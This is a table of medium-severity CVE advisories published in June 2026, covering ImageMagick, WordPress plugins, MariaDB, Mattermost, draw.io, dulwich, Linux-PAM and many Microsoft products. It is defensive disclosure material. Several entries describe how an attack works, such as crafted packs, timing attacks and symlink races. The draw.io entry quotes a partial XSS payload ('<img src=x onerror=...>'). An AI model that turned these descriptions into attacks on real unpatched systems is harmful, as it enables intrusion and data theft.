| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-50 and 7.1.2-25, when an allocation fails in CheckPrimitiveExtent this can result in a heap-use-after-free and result in a crash. This issue has been patched in versions 6.9.13-50 and 7.1.2-25. | 2026-06-10 | 5.9 | CVE-2026-53462 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-48 and 7.1.2-23, an incorrect check in the JP2 will result in an heap buffer over-write of a single byte when specifying certain options. This issue has been patched in versions 6.9.13-48 and 7.1.2-23. | 2026-06-10 | 4 | CVE-2026-46559 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-48 and 7.1.2-23, an attacker who can connect to a magick -distribute-cache service can cause a heap buffer over-write in the server process. This issue has been patched in versions 6.9.13-48 and 7.1.2-23. | 2026-06-10 | 4.1 | CVE-2026-46692 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-48 and 7.1.2-23, an attacker who can connect to a magick -distribute-cache service can hijack a file descriptor in the server process when a race condition is met. This issue has been patched in versions 6.9.13-48 and 7.1.2-23. | 2026-06-10 | 4.1 | CVE-2026-46693 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-48 and 7.1.2-23, the distributed pixel cache was originally designed to operate without a challenge-response authentication model. This has been changed in versions 6.9.13-48 and 7.1.2-23. | 2026-06-10 | 4.1 | CVE-2026-47165 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-49 and 7.1.2-24, an infinite loop in the subimage-search operation can happen when using a crafted image. This issue has been patched in versions 6.9.13-49 and 7.1.2-24. | 2026-06-10 | 4.7 | CVE-2026-48733 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-50 and 7.1.2-25, when passing incorrect arguments in the distort operation a null pointer deference will occur. This issue has been patched in versions 6.9.13-50 and 7.1.2-25. | 2026-06-10 | 4.3 | CVE-2026-53463 |
| ImageMagick--ImageMagick | ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to version 7.1.2-25, when providing invalid options to the wand option parser a small memory leak will occur. This issue has been patched in version 7.1.2-25. | 2026-06-10 | 4 | CVE-2026-53464 |
| imvks786--student_management_system | A weakness has been identified in imvks786 student_management_system up to 9599b560ad3c3b83e75d328b76bedcd489ef1f46. Affected is an unknown function of the file /add.php of the component Student Record Handler. Executing a manipulation can lead to improper access controls. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-08 | 6.3 | CVE-2026-11532 |
| imvks786--student_management_system | A security vulnerability has been detected in imvks786 student_management_system up to 9599b560ad3c3b83e75d328b76bedcd489ef1f46. Affected by this vulnerability is an unknown functionality of the file /see.php of the component Student Deletion Endpoint. The manipulation of the argument del leads to improper authorization. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-08 | 5.4 | CVE-2026-11533 |
| itsourcecode--Hospital Management System | A vulnerability was detected in itsourcecode Hospital Management System 1.0. Impacted is an unknown function of the file /adminaccount.php. The manipulation of the argument Date results in sql injection. The attack can be launched remotely. The exploit is now public and may be used. | 2026-06-08 | 6.3 | CVE-2026-11513 |
| itsourcecode--Hospital Management System | A flaw has been found in itsourcecode Hospital Management System 1.0. The affected element is an unknown function of the file /addpatient.php. This manipulation of the argument admissiontme causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used. | 2026-06-08 | 6.3 | CVE-2026-11514 |
| itsourcecode--Hospital Management System | A security vulnerability has been detected in itsourcecode Hospital Management System 1.0. This issue affects some unknown processing of the file /billing.php. The manipulation of the argument patientid leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. | 2026-06-08 | 4.3 | CVE-2026-11512 |
| jasonpitts--WP Meta Sort Posts | The WP Meta Sort Posts plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.9. This is due to missing or incorrect nonce validation on the top-level included script in msp-options.php. This makes it possible for unauthenticated attackers to change the plugin's msp_loop_file and msp_nav_location settings via a forged request via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-06-09 | 4.3 | CVE-2026-8940 |
| jdm-labs--WP ApplicantStack Jobs Display | The WP ApplicantStack Jobs Display plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Shortcode Attributes in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-09 | 6.4 | CVE-2026-8882 |
| jelmer--dulwich | Dulwich is a pure-Python implementation of the Git file formats and protocols. Starting in version 0.1.0 and prior to version 1.2.5, a client with push access could push a tiny crafted thin pack (~174 bytes) whose delta header declares a huge dest_size. When dulwich ingested it via add_thin_pack / apply_delta, it would allocate hundreds of MB of memory based on that attacker-controlled size, with no relationship to the actual bytes received. Operators running a Dulwich-based Git server that exposes git-receive-pack (i.e. accepts pushes) - for example via dulwich.server functionality, the HTTP smart server, or anything built on ReceivePackHandler - are impacted. The issue is patched in 1.2.5. add_thin_pack now accepts a max_input_size keyword (bytes; 0/None = unlimited, matching git's semantics), and ReceivePackHandler reads receive.maxInputSize from the repository config and passes it through. Wire reads are counted and a PackInputTooLarge exception is raised once the cap is exceeded - equivalent to git index-pack --max-input-size. Users should upgrade to Dulwich 1.2.5 or later and set receive.maxInputSize in their server's repository config to a sane bound for their environment. On unpatched versions, receive.maxInputSize has no effect, so it cannot be used as a workaround. Until upgrading, operators should restrict dulwich-receive-pack (push) access to trusted, authenticated clients only, or disable it entirely on servers that only need to serve fetches and/or run the server under an OS-level memory limit (e.g. ulimit, cgroups/MemoryMax, or a container memory limit) so a malicious push is killed rather than taking down the host. | 2026-06-10 | 5.7 | CVE-2026-47734 |
| jflyfox--jfinal_cms | A vulnerability was identified in jflyfox jfinal_cms up to 5.1.0. This impacts the function list of the file AdvicefeedbackController.java. Such manipulation of the argument orderBy leads to sql injection. The attack can be launched remotely. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-08 | 6.3 | CVE-2026-11473 |
| jgraph--drawio | draw.io is a configurable diagramming and whiteboarding application. Prior to version 29.7.12, a crafted .drawio file can execute arbitrary JavaScript in the editor's origin when the file is opened. The vulnerability is not in the label sanitizer (which works correctly on the rendering path) but in a feature-detection routine in the Text Format panel that reads the raw cell label and assigns it to a detached element's innerHTML without sanitization. Browsers fire onerror for failed image loads even on detached elements, so an <img src=x onerror=...> payload in any cell label triggers script execution as soon as the cell is selected - which import does automatically. This issue has been patched in version 29.7.12. | 2026-06-10 | 6.1 | CVE-2026-46642 |
| joshin85--Plugin Name: ePaperFlip Publisher | The ePaperFlip Publisher plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'publicationid' attribute of the `epaperflip_embed` shortcode in all versions up to, and including, 1. This is due to insufficient input sanitization and output escaping on the shortcode attribute which is injected directly into inline JavaScript. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-09 | 6.4 | CVE-2026-7662 |
| kenz60--kk blog card | The kk blog card plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'blog-card' shortcode in all versions up to, and including, 1.3. This is due to insufficient input sanitization and output escaping on the shortcode's 'href' and 'type' attributes, which are concatenated directly into HTML attribute contexts in the shortcode callback registered in kk-blog-card-shortcode.php. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-06-09 | 6.4 | CVE-2026-8895 |
| koel--koel | Koel is a free, open-source music streaming solution. Prior to version 9.7.1, Koel contains a Server-Side Request Forgery (SSRF) vulnerability in the radio station creation endpoint (POST /api/radio/stations). The url field validation rules are declared without the bail keyword, so the HasAudioContentType rule - which issues HTTP requests to the supplied URL - still executes even after the SafeUrl rule has rejected the URL as pointing to a private/reserved address. Any authenticated, non-admin user can therefore coerce the server into making HEAD/GET requests to arbitrary internal hosts. This issue has been patched in version 9.7.1. | 2026-06-12 | 6.3 | CVE-2026-50552 |
| kovidgoyal--kitty | Kitty is a cross-platform GPU based terminal. In versions prior to 0.47.2, a local privilege escalation vulnerability exists in kitty's file transmission protocol where a child process running in the terminal can write to arbitrary files on the filesystem by exploiting a TOCTOU (Time-of-Check-Time-of-Use) race condition between symlink validation and file creation. The `os.open()` call used to create files does not use `O_NOFOLLOW`, allowing an attacker to create a symlink between the initial stat check and the actual file open, causing the write to follow the symlink to an arbitrary destination. Version 0.47.2 fixes the issue. | 2026-06-12 | 5 | CVE-2026-54055 |
| Kushan2k--student-management-system | A weakness has been identified in Kushan2k student-management-system up to f16a4ceaddd6729c4b306ed4641cda3176c1ef2a. Affected by this vulnerability is the function getStatus of the file controllers/GradeController.php of the component Certificate Verification Endpoint. Executing a manipulation of the argument nic can lead to sql injection. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-08 | 6.3 | CVE-2026-11475 |
| Kushan2k--student-management-system | A security vulnerability has been detected in Kushan2k student-management-system up to f16a4ceaddd6729c4b306ed4641cda3176c1ef2a. Affected by this issue is the function edit-admin of the file controllers/AdminController.php of the component Profile Update Endpoint. The manipulation of the argument isadmin leads to improper authorization. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-08 | 6.3 | CVE-2026-11476 |
| Lenovo--Application | A vulnerability was identified in the Lenovo Android Application, distributed exclusively on tablets in the Chinese market, that could allow a website visited by the built-in browser to overwrite system clipboard contents. | 2026-06-10 | 4.3 | CVE-2026-7516 |
| Lenovo--X13 Gen 6 (Type 21RK, 21RL) Laptops (ThinkPad) BIOS | During an internal security assessment, a potential vulnerability was discovered in some ThinkPad embedded controller firmware that could allow a privileged local user to perform arbitrary reads or writes to privileged memory regions. | 2026-06-10 | 6.7 | CVE-2025-10237 |
| Lenovo--X13 Gen 6 (Type 21RK, 21RL) Laptops (ThinkPad) BIOS | During an internal security assessment, a potential out-of-bounds write vulnerability was discovered in the BIOS of some ThinkPad products could allow a privileged local user to execute code in System Management Mode (SMM). | 2026-06-10 | 6.7 | CVE-2025-10238 |
| Linux-PAM--Linux-PAM | Linux-PAM through 1.7.2 contains an observable timing discrepancy (CWE-208) in the pam_userdb module's plaintext-password comparison path in modules/pam_userdb/pam_userdb.c that allows a local or network-adjacent attacker able to repeatedly drive authentication through a calling service to recover the plaintext password of a target account by measuring response-timing differences. The comparison uses strncmp() (or strncasecmp() when PAM_ICASE_ARG is set) preceded by a length-equality check, so the time to reject a candidate depends on the index of the first differing byte and on whether the candidate's length matches the stored password, leaking the password length and individual prefix bytes. The vulnerable path is reached when the administrator configures pam_userdb with crypt=none, with an unrecognized crypt method, or without a crypt= argument, causing the module to store and compare credentials in plaintext. | 2026-06-14 | 5.9 | CVE-2026-54411 |
| lldpd--lldpd | lldpd is an implementation of IEEE 802.1ab (LLDP). Prior to version 1.0.22, lldpd_decode() in src/daemon/lldpd.c strips 802.1Q VLAN tags from received Ethernet frames by calling memmove() to shift the frame payload 4 bytes left. The third argument (byte count) is s - 2 * ETHER_ADDR_LEN but should be s - 2 * ETHER_ADDR_LEN - 4, causing a 4-byte heap buffer over-read past the malloc(h_mtu) allocation when the received frame size equals the interface MTU. This issue has been patched in version 1.0.22. | 2026-06-09 | 6.5 | CVE-2026-46433 |
| M2Team--NanaZip | NanaZip is the 7-Zip derivative intended for the modern Windows experience. From version 3.0.1000.0 to before version 6.0.1698.0, a heap out-of-bounds read exists in the Android Verified Boot (AVB) vbmeta image parser in NanaZip (via the upstream 7-Zip AvbHandler). An unsigned integer underflow in a bounds check allows an attacker-controlled value_num_bytes field to pass validation, causing AddNameToString to read up to ~4 GiB past the end of a 64 KiB heap buffer. This causes a deterministic crash (denial of service) when opening a crafted .avb or .img file. This issue has been patched in stable version 6.0.1698.0 and preview version 6.5.1742.0. | 2026-06-12 | 5.4 | CVE-2026-47222 |
| M2Team--NanaZip | NanaZip is the 7-Zip derivative intended for the modern Windows experience. From version 3.0.1000.0 to before version 6.0.1698.0, a heap out-of-bounds read exists in the Android Verified Boot (AVB) vbmeta image parser in NanaZip (via the upstream 7-Zip AvbHandler). A 32-bit unsigned integer overflow in the bounds check pos + ht.salt_len > descSize allows an attacker-controlled salt_len field to bypass validation, causing CByteBuffer::CopyFrom to memcpy up to ~4 GiB past the end of a 64. This issue has been patched in stable version 6.0.1698.0 and preview version 6.5.1742.0. | 2026-06-12 | 5.4 | CVE-2026-47223 |
| M2Team--NanaZip | NanaZip is the 7-Zip derivative intended for the modern Windows experience. From version 3.0.1000.0 to before version 6.0.1698.0, a heap buffer-overflow read exists in the LVM2 physical-volume metadata parser in NanaZip (via the upstream 7-Zip LvmHandler). The vulnerability is triggered when opening a crafted LVM disk image. This issue has been patched in stable version 6.0.1698.0 and preview version 6.5.1742.0. | 2026-06-12 | 4.3 | CVE-2026-47224 |
| MacWarrior--clipbucket-v5 | ClipBucket v5 is an open source video sharing platform. Prior to version 5.5.3 - #133, a normal authenticated user can edit another user's video subtitles because of a lack of authorization. They can upload subtitles, edit their name or delete them. This issue has been patched in version 5.5.3 - #133. | 2026-06-11 | 6.5 | CVE-2026-47238 |
| MacWarrior--clipbucket-v5 | ClipBucket v5 is an open source video sharing platform. Prior to version 5.5.3 - #141, ClipBucket v5 contains an improper neutralization of SQL wildcard characters in the subtitle editing endpoint. An authenticated user can send a % character as the number parameter to overwrite all subtitle titles of any video they own in a single HTTP request. This issue has been patched in version 5.5.3 - #141. | 2026-06-11 | 4.3 | CVE-2026-49482 |
| Magepeople inc.--WpEvently | Cross-Site request forgery (CSRF) vulnerability in Magepeople inc. WpEvently allows Cross Site Request Forgery. This issue affects WpEvently: from n/a through 4.1.2. | 2026-06-11 | 4.3 | CVE-2024-32110 |
| mailerpress--MailerPress Email Marketing, Newsletter, Email Automation & WooCommerce Emails | The MailerPress - Email Marketing, Newsletter, Email Automation & WooCommerce Emails plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Campaign HTML Content Field in all versions up to, and including, 2.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The public-facing campaign preview endpoint (/mp-email/{id}-slug/) is not affected by this vulnerability, as it applies a Content-Security-Policy header blocking all inline scripts; exploitation is limited to the admin dashboard preview. | 2026-06-09 | 6.4 | CVE-2026-8599 |
| MariaDB--server | MariaDB server is a community developed fork of MySQL server. From versions 10.6.1 to before 10.6.26, 10.11.1 to before 10.11.17, 11.4.1 to before 11.4.11, 11.8.1 to before 11.8.7, and 12.3.1, mbstream did not check for /../ in the path when unpacking the archive. A proper backup can never contain such paths, but a specially crafted archive could have caused mbstream to create files outside of the target-dir path. This issue has been patched in versions 10.6.26, 10.11.17, 11.4.11, 11.8.7, and 12.3.2. | 2026-06-12 | 6.3 | CVE-2026-44171 |
| MariaDB--server | MariaDB server is a community developed fork of MySQL server. From versions 10.6.1 to before 10.6.26, 10.11.1 to before 10.11.17, 11.4.1 to before 11.4.11, 11.8.1 to before 11.8.7, and 12.3.1, MariaDB allowed SELECT ... INTO OUTFILE and SELECT ... INTO DUMPFILE without verifying the FILE privilege if the FROM clause contained only subqueries. This issue has been patched in versions 10.6.26, 10.11.17, 11.4.11, 11.8.7, and 12.3.2. | 2026-06-12 | 5 | CVE-2026-44173 |
| MariaDB--server | MariaDB server is a community developed fork of MySQL server. From versions 11.4.1 to before 11.4.11, 11.8.1 to before 11.8.7, and 12.3.1, a user getting EXECUTE access to a stored routine via a role, could see the routine definition even without SHOW CREATE ROUTINE privilege. This issue has been patched in versions 11.4.11, 11.8.7, and 12.3.2. | 2026-06-12 | 4.3 | CVE-2026-44169 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.1, 11.5.x <= 11.5.4, 10.11.x <= 10.11.15, 10.11.x <= 10.11.16 fail to require system-level permission when patching protected default system roles, which allows authenticated users with delegated user-management permissions to escalate privileges by altering built-in role permissions via the role patch API.. Mattermost Advisory ID: MMSA-2026-00656 | 2026-06-12 | 6.7 | CVE-2026-6739 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.1, 11.5.x <= 11.5.4, 10.11.x <= 10.11.15 fail to sanitize the Remote Cluster API response on PATCH operations, which allows authenticated users with the {{manage_secure_connections}} permission to obtain remote cluster authentication tokens via a PATCH request to the remote cluster endpoint.. Mattermost Advisory ID: MMSA-2026-00662 | 2026-06-12 | 6.5 | CVE-2026-7184 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.1, 11.5.x <= 11.5.4, 10.11.x <= 10.11.15, 10.11.x <= 10.11.16 fail to validate that a username returned during bot registration belongs to a bot account, which allows an unprivileged attacker to intercept private messages sent by plugins via direct message channels by pre-registering a user account with a predictable plugin bot username.. Mattermost Advisory ID: MMSA-2026-00649 | 2026-06-12 | 5.3 | CVE-2026-6046 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.1, 11.5.x <= 11.5.4, 10.11.x <= 10.11.15, 10.11.x <= 10.11.16 fail to restrict role_updated websocket event broadcasts to members of the affected team or channel which allows an authenticated attacker with guest-level access to observe permission scheme change notifications for private teams they are not a member of via the websocket connection.. Mattermost Advisory ID: MMSA-2026-00616 | 2026-06-12 | 4.3 | CVE-2026-3433 |
| Mattermost--Mattermost | Mattermost versions 11.6.x <= 11.6.1, 11.5.x <= 11.5.4, 10.11.x <= 10.11.15, 10.11.x <= 10.11.16 Fail to enforce PermissionInviteUser when setting AllowOpenInvite or AllowedDomains during team creation (the check was only applied on update/patch), which allows an authenticated user holding PermissionCreateTeam but not PermissionInviteUser on the resulting team to configure invite-controlled team settings (make the team publicly joinable via open invite and/or constrain membership via allowed domains) that they are not permitted to set on an existing team via POST /api/v4/teams with allow_open_invite: true and/or a non-empty allowed_domains in the request body.. Mattermost Advisory ID: MMSA-2026-00655 | 2026-06-12 | 4.3 | CVE-2026-6689 |
| maxfoundry--WP-Paginate | WordPress Plugin WP-Paginate 2.1.3 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by manipulating the preset parameter. Attackers can submit POST requests to the plugin settings page with script payloads in the preset parameter that are stored and executed when administrators view the settings. | 2026-06-08 | 6.4 | CVE-2021-47982 |
| metal3-io--ip-address-manager | IPAM is the IP address Manager for Cluster API Provider Metal3. Prior to versions 1.11.7, 1.12.4, and 1.13.0, the IPAM controller's ClusterRole granted full CRUD permissions (create, delete, get, list, patch, update, watch) on core/v1 Secrets. The controller never accesses Secrets during normal operation. If the controller pod were compromised (e.g. via supply chain attack or container escape), an attacker could leverage these excessive permissions to read, modify, or delete Secrets in the namespace, potentially exposing credentials and other sensitive data. This issue has been patched in versions 1.11.7, 1.12.4, and 1.13.0. | 2026-06-12 | 4.4 | CVE-2026-47190 |
| Microsoft--.NET 10.0 | Improper link resolution before file access ('link following') in .NET allows an unauthorized attacker to perform tampering locally. | 2026-06-09 | 6.2 | CVE-2026-45491 |
| Microsoft--Microsoft 365 Apps for Enterprise | Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information locally. | 2026-06-09 | 5.5 | CVE-2026-44821 |
| Microsoft--Microsoft 365 Apps for Enterprise | Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information locally. | 2026-06-09 | 4.7 | CVE-2026-45460 |
| Microsoft--Microsoft Bing Search for Android | User interface (ui) misrepresentation of critical information in Microsoft Bing allows an unauthorized attacker to perform spoofing over a network. | 2026-06-09 | 4.3 | CVE-2026-45650 |
| Microsoft--Microsoft Defender for Endpoint for Mac | Time-of-check time-of-use (toctou) race condition in Microsoft Defender for Endpoint allows an authorized attacker to elevate privileges locally. | 2026-06-09 | 5.5 | CVE-2026-45647 |
| Microsoft--Microsoft Exchange Server 2016 Cumulative Update 23 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Exchange Server allows an unauthorized attacker to perform spoofing over a network. | 2026-06-09 | 6.1 | CVE-2026-45500 |
| Microsoft--Microsoft Exchange Server 2016 Cumulative Update 23 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Exchange Server allows an unauthorized attacker to perform spoofing over a network. | 2026-06-09 | 6.5 | CVE-2026-45501 |
| Microsoft--Microsoft Exchange Server 2016 Cumulative Update 23 | Server-side request forgery (ssrf) in Microsoft Exchange Server allows an authorized attacker to disclose information over a network. | 2026-06-09 | 5 | CVE-2026-45502 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper limitation of a pathname to a restricted directory ('path traversal') in Microsoft Office SharePoint allows an authorized attacker to execute code over a network. | 2026-06-09 | 6.5 | CVE-2026-45454 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 5.4 | CVE-2026-33113 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 5.4 | CVE-2026-45453 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 5.4 | CVE-2026-45464 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 5.4 | CVE-2026-45465 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 5.4 | CVE-2026-47636 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 5.4 | CVE-2026-47639 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 5.4 | CVE-2026-48560 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 4.6 | CVE-2026-45462 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 4.6 | CVE-2026-45467 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 4.6 | CVE-2026-45468 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 4.6 | CVE-2026-45479 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office Project Server allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 4.6 | CVE-2026-45483 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 4.6 | CVE-2026-47637 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 4.6 | CVE-2026-47638 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 4.6 | CVE-2026-47640 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 4.6 | CVE-2026-47641 |
| Microsoft--Microsoft SharePoint Enterprise Server 2016 | Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network. | 2026-06-09 | 4.6 | CVE-2026-48562 |
| Microsoft--Visual Studio Code | Exposure of sensitive information to an unauthorized actor in Visual Studio Code allows an unauthorized attacker to disclose information over a network. | 2026-06-09 | 6.5 | CVE-2026-47284 |
| Microsoft--Visual Studio Code | Relative path traversal in Visual Studio Code allows an unauthorized attacker to perform tampering over a network. | 2026-06-09 | 6.5 | CVE-2026-47287 |
| Microsoft--Windows 10 Version 1607 | Null pointer dereference in Windows Kerberos allows an authorized attacker to deny service over a network. | 2026-06-09 | 6.5 | CVE-2026-42903 |
| Microsoft--Windows 10 Version 1607 | Out-of-bounds read in Windows DHCP Server allows an authorized attacker to disclose information locally. | 2026-06-09 | 6.8 | CVE-2026-45608 |
| Microsoft--Windows 10 Version 1607 | Protection mechanism failure in Windows BitLocker allows an unauthorized attacker to bypass a security feature with a physical attack. | 2026-06-09 | 6.8 | CVE-2026-50507 |
| Microsoft--Windows 10 Version 1607 | Exposure of sensitive information to an unauthorized actor in Windows NTLM allows an unauthorized attacker to perform spoofing over a network. | 2026-06-09 | 6.5 | CVE-2026-50508 |
| Microsoft--Windows 10 Version 1607 | Windows Kerberos Denial of Service Vulnerability | 2026-06-09 | 5.3 | CVE-2026-42914 |
| Microsoft--Windows 10 Version 1607 | Out-of-bounds read in Windows Telephony Service allows an authorized attacker to disclose information locally. | 2026-06-09 | 5.5 | CVE-2026-42968 |
| Microsoft--Windows 10 Version 1607 | Use of uninitialized resource in Windows Push Notifications allows an authorized attacker to disclose information locally. | 2026-06-09 | 5.5 | CVE-2026-42969 |
| Microsoft--Windows 10 Version 1607 | Use of uninitialized resource in Windows Push Notifications allows an authorized attacker to disclose information locally. | 2026-06-09 | 5.5 | CVE-2026-42970 |
| Microsoft--Windows 10 Version 1607 | Use of uninitialized resource in Windows Push Notifications allows an authorized attacker to disclose information locally. | 2026-06-09 | 5.5 | CVE-2026-42971 |
| Microsoft--Windows 10 Version 1607 | Exposure of sensitive information to an unauthorized actor in Windows Hyper-V allows an authorized attacker to disclose information locally. | 2026-06-09 | 5.5 | CVE-2026-42972 |
| Microsoft--Windows 10 Version 1607 | Use of uninitialized resource in Windows Push Notifications allows an authorized attacker to disclose information locally. | 2026-06-09 | 5.5 | CVE-2026-42973 |
| Microsoft--Windows 10 Version 1607 | Exposure of sensitive information to an unauthorized actor in Windows Application Identity (AppID) Subsystem allows an authorized attacker to disclose information locally. | 2026-06-09 | 5.5 | CVE-2026-45594 |
| Microsoft--Windows 10 Version 1607 | Protection mechanism failure in Windows Mark of the Web (MOTW) allows an unauthorized attacker to bypass a security feature over a network. | 2026-06-09 | 5.4 | CVE-2026-45595 |
| Microsoft--Windows 10 Version 1607 | Out-of-bounds read in Microsoft UxTheme Library (uxtheme.dll) allows an authorized attacker to deny service locally. | 2026-06-09 | 5.5 | CVE-2026-45606 |
| Microsoft--Windows 10 Version 1607 | Out-of-bounds read in Windows DHCP Server allows an authorized attacker to disclose information locally. | 2026-06-09 | 5.5 | CVE-2026-45634 |
| Microsoft--Windows 10 Version 1607 | Protection mechanism failure in Windows BitLocker allows an unauthorized attacker to bypass a security feature with a physical attack. | 2026-06-09 | 5.3 | CVE-2026-45655 |
| Microsoft--Windows 10 Version 1809 | Exposure of sensitive information to an unauthorized actor in Windows Shell allows an authorized attacker to disclose information locally. | 2026-06-09 | 6.5 | CVE-2026-42907 |
| Microsoft--Windows 10 Version 21H2 | Exposure of sensitive information to an unauthorized actor in Windows Shell allows an authorized attacker to disclose information locally. | 2026-06-09 | 5.5 | CVE-2026-42906 |
| Microsoft--Windows 10 Version 21H2 | Incorrect calculation of buffer size in Windows TCP/IP allows an authorized attacker to deny service over an adjacent network. | 2026-06-09 | 5.7 | CVE-2026-42915 |
| Microsoft--Windows 11 version 23H2 | Out-of-bounds read in Windows Application Identity (AppID) Subsystem allows an authorized attacker to disclose information locally. | 2026-06-09 | 5.5 | CVE-2026-45604 |
| Microsoft--Windows 11 Version 24H2 | Out-of-bounds read in Windows DWM Core Library allows an authorized attacker to disclose information locally. | 2026-06-09 | 5.5 | CVE-2026-48566 |
| Microsoft--Windows 11 version 26H1 | Out-of-bounds read in Windows DWM Core Library allows an authorized attacker to disclose information locally. | 2026-06-09 | 5.5 | CVE-2026-44814 |
| Microsoft--Windows Server 2019 | Use after free in Windows Network Controller (NC) Host Agent allows an authorized attacker to deny service locally. | 2026-06-09 | 5.5 | CVE-2026-44805 |
